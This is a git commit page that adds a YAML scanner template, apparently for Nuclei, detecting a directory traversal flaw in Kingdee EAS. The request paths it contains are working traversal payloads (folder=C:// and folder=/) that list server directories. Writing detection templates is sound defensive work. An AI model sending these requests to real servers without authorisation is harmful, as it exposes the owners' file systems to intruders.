Merge pull request #4055 from ritikchaddha/patch-5
Create kingdee-eas-directory-traversal.yamlpatch-1
commit
3b767cd5b6
|
@ -0,0 +1,35 @@
|
||||||
|
id: kingdee-eas-directory-traversal
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Kingdee EAS - Directory Traversal
|
||||||
|
author: ritikchaddha
|
||||||
|
severity: medium
|
||||||
|
description: Kingdee OA server_file has a directory traversal vulnerability, attackers can obtain sensitive server information through directory traversal.
|
||||||
|
reference:
|
||||||
|
- https://github.com/nu0l/poc-wiki/blob/main/%E9%87%91%E8%9D%B6OA%20server_file%20%E7%9B%AE%E5%BD%95%E9%81%8D%E5%8E%86%E6%BC%8F%E6%B4%9E.md
|
||||||
|
tags: kingdee,lfi,traversal
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/appmonitor/protected/selector/server_file/files?folder=C://&suffix="
|
||||||
|
- "{{BaseURL}}/appmonitor/protected/selector/server_file/files?folder=/&suffix="
|
||||||
|
|
||||||
|
stop-at-first-match: true
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
part: body
|
||||||
|
words:
|
||||||
|
- '{"name":"Windows","path":"C:\\\\Windows","folder":true}'
|
||||||
|
- '{"name":"root","path":"/root","folder":true}'
|
||||||
|
condition: or
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- "application/json"
|
||||||
|
part: header
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
Loading…
Reference in New Issue